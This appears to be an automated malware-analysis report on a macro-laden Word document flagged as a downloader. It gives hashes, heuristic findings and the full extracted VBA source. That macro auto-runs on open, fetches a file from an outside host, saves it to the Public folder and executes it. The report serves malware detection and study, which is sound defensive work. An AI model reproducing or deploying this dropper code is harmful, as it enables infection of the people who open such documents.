Office (OOXML) malware analysis — malicious · bd60e16aeff7b951

MALICIOUS

Office (OOXML)

139.8 KB Created: 2021-02-07 17:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-19

MD5: cd1801897646cd4ff352983c19509cf0 SHA-1: d2c9b5e883a10f4478cb75f46c1fb5f353726760 SHA-256: bd60e16aeff7b951d496f64de9ae56c27efe4e3ff1dacae0a0648279ac677bbd

290 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.BlueWord-9845926-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.BlueWord-9845926-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
      f = VarSelectIndex.ResponseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
      Set VarSelectIndex = CreateObject(GenericClearGlobal)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2193 bytes
SHA-256: `24d56e7cb6c0f43132ff8d4c249bac6c023e0af8cc1a8cc1c2805e211fc1445b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() InstrumentationUtil.CheckBox1_Click End Sub Attribute VB_Name = "InstrumentationUtil" Attribute VB_Base = "0{DED8BE19-8EDD-4481-A589-563B966BE7B0}{818D2A96-3437-4E8F-A469-63F8871669C1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Public DeletePointer Public CopySize Public SizeFuncOption Public Sub CheckBox1_Click() ListBox1.AddItem (CommandButton1.Tag) ListBox1.AddItem (CheckBox1.Tag) CommandButton1_Click ListBox1_Click End Sub Private Sub CommandButton1_Click() ListBox1.AddItem (Image1.ControlTipText) ListBox1.AddItem ("://statilion.com/header.jpg") End Sub Private Sub ListBox1_Click() InstrumentationUtil.DeletePointer = "C:\users\Public\" + "ttl.jpg" InstrumentationUtil.CopySize = "http" InstrumentationUtil.SizeFuncOption = "GET" RightVar = 1 Dim VarSelectIndex As Object Dim GlobalCounterRef As Object For Each GenericClearGlobal In ListBox1.List If RightVar = Len("Z") Then Set VarSelectIndex = CreateObject(GenericClearGlobal) VarSelectIndex.Open InstrumentationUtil.SizeFuncOption, InstrumentationUtil.CopySize & ListBox1.List(3), False VarSelectIndex.Send End If If RightVar = Len("ZZ") Then Set GlobalCounterRef = CreateObject(GenericClearGlobal & "am") GlobalCounterRef.Open GlobalCounterRef.Type = Len("Z") f = VarSelectIndex.ResponseBody GlobalCounterRef.Write f GlobalCounterRef.SaveToFile InstrumentationUtil.DeletePointer, 2 End If If RightVar = Len("ZZZ") Then Shell% (GenericClearGlobal + " " & InstrumentationUtil.DeletePointer) End If RightVar = RightVar + 1 Next End Sub Private Sub skuid_Change() End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	99328 bytes
SHA-256: `e953959e7df7a6755115a28358c03164c8846f2bba3f56098c6871dab2f57b02`
Detection ClamAV: Doc.Downloader.BlueWord-9845926-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.